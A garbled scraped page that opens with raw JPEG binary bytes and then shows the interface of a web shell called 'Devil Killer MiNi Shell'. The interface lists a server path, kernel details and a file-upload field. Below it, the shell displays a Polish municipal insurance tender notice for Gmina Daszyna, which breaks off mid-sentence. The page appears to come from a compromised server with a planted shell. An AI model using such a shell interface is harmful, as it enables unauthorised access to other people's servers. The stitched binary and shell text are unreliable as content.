JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20231124/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20231124/0051303101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ubezpieczenie Gminy Daszyna na lata 2024- 2027 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA DASZYNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015885</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">34A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Daszyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-107</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL715 - Skierniewicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24-357-10-00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminadaszyna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.daszyna.4bip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">HM Consulting Sp. z o.o</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">725-205-51-80</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">ul. Gdańska 126/128</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">90-520</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">biuro@hm-c.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">http://hm-c.pl/kontakt/</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ubezpieczenie Gminy Daszyna na lata 2024- 2027 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b7056c83-8aba-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00513031</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00092770/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Ubezpieczenie Gminy Daszyna na lata 2024- 2027</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b7056c83-8aba-11ee-b55a-a22b2d7f700e <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> 5.1. Zamawiający określa poufny charakter informacji zawartych w następujących Załącznikach do SWZ:<br/>5.1.1 Załącznik nr 1 – Opis przedmiotu zamówienia – Zadanie I i Zadanie II<br/>5.1.2 Załącznik nr 5 – Dane do oceny ryzyka i szkodowość_Zadanie I i Zadanie II<br/>5.2. Wykonawca może uzyskać dostęp do informacji poufnych poprzez wystąpienie z wnioskiem do Zamawiającego o ich<br/>udostępnienie w formie elektronicznej poprzez Platformę e-Zamówienia.<br/>5.3. We wniosku o udostępnienie informacji poufnych Wykonawca winien wskazać dane dotyczące Wnioskodawcy i<br/>Wykonawcy, którego reprezentuje, powołując się na numer postępowania.<br/>5.4. Wszelkie informacje, zawarte w niniejszej SWZ są przeznaczone wyłącznie do przygotowania oferty i nie powinny być<br/>wykorzystywane w innym celu ani udostępniane osobom trzecim, niebiorącym udziału w niniejszym postępowaniu, chyba,<br/>że jest to niezbędne i konieczne do przygotowania oferty. Wykonawca zobowiązany jest do zachowania poufności co do<br/>treści wszelkich dokumentów i informacji uzyskanych w związku z prowadzeniem niniejszego postępowania, zgodnie z<br/>zasadą określoną w art. 35 i nast. ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (t.j.<br/>Dz.U. z 2023 r. poz. 656 ze zm.). <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">7.1. W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami<br/>odbywa się przy użyciu środków komunikacji elektronicznej, tj.:<br/>7.1.1. Pocztą elektroniczną na adres e-mail Zamawiającego sekretariat@gminadaszyna.pl oraz adresy e-mail Wykonawców podane<br/>w formularzach ofertowych. Po otwarciu ofert kontakt przez adres e-mail będzie możliwy tylko poprzez adres (adresy) wskazany w<br/>formularzu ofertowym lub<br/>7.1.2. poprzez Platformę e-Zamówienia (zwana dalej „Platformą”) https://ezamowienia.gov.pl z zastrzeżeniem, że złożenie oferty<br/>następuje wyłącznie przy użyciu Platformy</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">4.1. Informacje na temat komunikacji za<br/>pośrednictwem Platformy dostępne są również w Instrukcji interaktywnej – „Komunikacja w postępowaniu” dostępnej pod adresem:<br/>https://ezamowienia.gov.pl/pl/komponent-edukacyjny/</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">29.1. W związku z przetwarzaniem danych osobowych osób fizycznych składających w<br/>imieniu wykonawcy ofertę, pełnomocników, osób reprezentujących wykonawcę oraz osób prowadzących postępowanie o udzielenie<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>zamówienia publicznego, realizując obowiązek o którym mowa w art. 13 RODO informujemy:<br/>29.1.1. Administratorem Danych Osobowych jest Wójt Gminy Daszyna – Zbigniew Wojtera<br/>29.1.2. Inspektorem Ochrony Danych Osobowych jest: Ewelina Witosławska<br/>29.1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c Rodo w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego.<br/>29.1.4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych oraz broker<br/>Zamawiającego przygotowujący i przeprowadzający postępowanie<br/>29.1.5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>29.1.6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp.<br/>29.1.7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, dane nie będą<br/>przekazywane do państwa trzeciego.<br/>29.1.8. Posiada Pan/Pani prawo dostępu do danych osobowych, sprostowania danych, żądania ograniczenia przetwarzania danych,<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych;<br/>29.1.9. Nie przysługuje Panu/Pani w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych, prawo do przenoszenia<br/>danych osobowych, prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PPI.271.9.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa: „Ubezpieczenie Gminy Daszyna na lata 2024-202<br/>niniejszej SWZ „przedmiotem zamówienia”.<br/>4.2. Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66512100-3 - Usługi ubezpieczenia od następstw nieszczęśliwych wypadków</p> <p class="mb-0">66514110-0 - Usługi ubezpieczeń pojazdów mechanicznych</p> <p class="mb-0">66516000-0 - Usługi ubezpieczenia od odpowiedzialności cywilnej</p> <p class="mb-0">66516100-1 - Usługi ubezpieczenia pojazdów mechanicznych od odpowiedzialności cywilnej</p> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">22. SPOSÓB OBLICZENIA CENY OFERTY I DOKONANIA OCENY OFERT<br/>22.1. Kryterium „CENA”:<br/>22.1.1. Wykonawca, określając cenę oferty, uwzględnia w niej wszystkie koszty wykonania zamówienia.<br/>22.1.2. Cena oferty to łączna suma składek ubezpieczeniowych (brutto) za okres obowiązywania umowy na wykonanie niniejszego<br/>zamówienia, obliczona zgodnie z Załącznikiem 3B – Formularz cenowy dla Zadania II.<br/>22.1.3. Cena oferty zostanie wyliczona przez Wykonawcę w oparciu o informacje zawarte<br/>w niniejszej SWZ.<br/>22.1.4. Wszystkie składniki ceny oferty winny być wyrażone w złotych polskich<br/>i podane w zaokrągleniu do pełnej złotówki.<br/>22.1.5. Ceny jednostkowe (stopa składki) określone przez Wykonawcę w ofercie nie będą zmieniane w toku realizacji przedmiotu<br/>zamówienia z zastrzeżeniem zapisów pkt 27.<br/>Zadanie II<br/>Klauzula punktowana nr 5 50 pkt<br/>Klauzula punktowana nr 6 25 pkt<br/>Klauzula punktowana nr 7 25 pkt<br/>Łącznie 100 pkt<br/>22.3. Oferty nieodrzucone będą oceniane wg wzoru:<br/>LP = (Cmin : CO x 100 pkt. x 0,90) + (WO x 0,10)<br/>gdzie:<br/>LP – całkowita liczba punktów przyznanych ocenianej ofercie,<br/>Cmin – najniższa cena oferty spośród ofert podlegających ocenie,<br/>CO – cena oferty ocenianej,<br/>WO – łączna liczba punktów za fakultatywne warunki ubezpieczenia przyjęte<br/>przez Wykonawcę w ocenianej ofercie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">PREFEROWANE WARUNKI UBEZPIECZENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa: „Ubezpieczenie Gminy Daszyna na lata 2024-20<br/>niniejszej SWZ „przedmiotem zamówienia”.<br/>4.2. Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66516400-4 - Usługi ubezpieczenia od ogólnej odpowiedzialności cywilnej</p> <p class="mb-0">66516000-0 - Usługi ubezpieczenia od odpowiedzialności cywilnej</p> <p class="mb-0">66512100-3 - Usługi ubezpieczenia od następstw nieszczęśliwych wypadków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-06 do 2027-01-05</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">22.2. Kryterium „PREFEROWANE WARUNKI UBEZPIECZENIA”<br/>22.2.1. Przez preferowane warunki ubezpieczenia rozumiane są klauzule umieszczone<br/>w Opisie przedmiotu zamówienia, opisane jako fakultatywne klauzule punktowane z kolejnym numerem porządkowym.<br/>Zaakceptowanie klauzuli fakultatywnej przez Wykonawcę nie stanowi podstawy do żądania zapłaty dodatkowej składki.<br/>22.2.2. W odniesieniu do każdej klauzuli punktowanej wymagane jest jednoznaczne ustosunkowanie się Wykonawcy, co do<br/>przyjęcia klauzuli – oznaczenie słowem TAK lub nie przyjęcia klauzuli – oznaczenie słowem NIE, w zaproponowanej treści (zgodnie<br/>z deklaracją przyjęcia/nie przyjęcia klauzul punktowanych – pkt. 6. Formularza oferty – Załącznik nr 2).<br/>22.2.3. Każda klauzula punktowana otrzymuje liczbę punktów zgodnie z pkt. 22.2.4. Liczba punktów wszystkich klauzul<br/>fakultatywnych zostanie zsumowana (maksymalnie 100 punktów). Jeżeli w tabeli będzie wpisane NIE lub jeżeli dane pole zostanie w<br/>tabeli puste, Zamawiający uzna, iż Wykonawca nie przyjął klauzuli i do obliczeń przyjmie dla tej pozycji wartość zero.<br/>22.2.4. Każda klauzula fakultatywna w przypadku przyjęcia, otrzyma odpowiednio wskazaną poniżej liczbę punktów:<br/>Zadanie I<br/>Klauzula punktowana nr 1 35 pkt<br/>Klauzula punktowana nr 2 30 pkt<br/>Klauzula punktowana nr 3 35 pkt<br/>Łącznie 100 pkt<br/>22.3. Oferty nieodrzucone będą oceniane wg wzoru:<br/>LP = (Cmin : CO x 100 pkt. x 0,90) + (WO x 0,10)<br/>gdzie:<br/>LP – całkowita liczba punktów przyznanych ocenianej ofercie,<br/>Cmin – najniższa cena oferty spośród ofert podlegających ocenie,<br/>CO – cena oferty ocenianej,<br/>WO – łączna liczba punktów za fakultatywne warunki ubezpieczenia przyjęte<br/>przez Wykonawcę w ocenianej ofercie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">PREFEROWANE WARUNKI UBEZPIECZENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 10.1. O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy:<br/>10.1.1. Nie podlegają wykluczeniu;<br/>10.1.2. Spełniają warunki udziału w postępowaniu.<br/>10.2. Zamawiający wyznacza następujące warunki udziału w postępowaniu:<br/>10.2.1. Posiadanie zdolności do występowania w obrocie gospodarczym. Warunek ten uznaje się za spełniony, jeśli<br/>Wykonawcy są wpisani do jednego z rejestrów zawodowych lub handlowych w kraju, w którym mają siedzibę lub miejsce<br/>zamieszkania, co w przypadku Wykonawców mających siedzibę na terenie RP oznacza, że są w pisani do Krajowego<br/>Rejestru Sądowego.<br/>10.2.2. Posiadanie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej. Warunek ten uznaje się<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>za spełniony, jeśli Wykonawcy posiadają zezwolenie na wykonywanie działalności ubezpieczeniowej w zakresie<br/>ubezpieczeń Działu II Załącznika do Ustawy z dnia 11.09.2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (Dz.U. z<br/>2021 poz. 1130) w zakresie nie mniejszym, niż opisany w niniejszej SWZ.<br/>10.3. Sytuacja ekonomiczna lub finansowa - Zamawiający nie stawia warunku w tym zakresie.<br/>10.4. Zdolności techniczne lub zawodowe - Zamawiający nie stawia warunku w tym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wstępne oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu i braku podstaw do wykluczenia z<br/>postępowania, stanowiące Załącznik nr 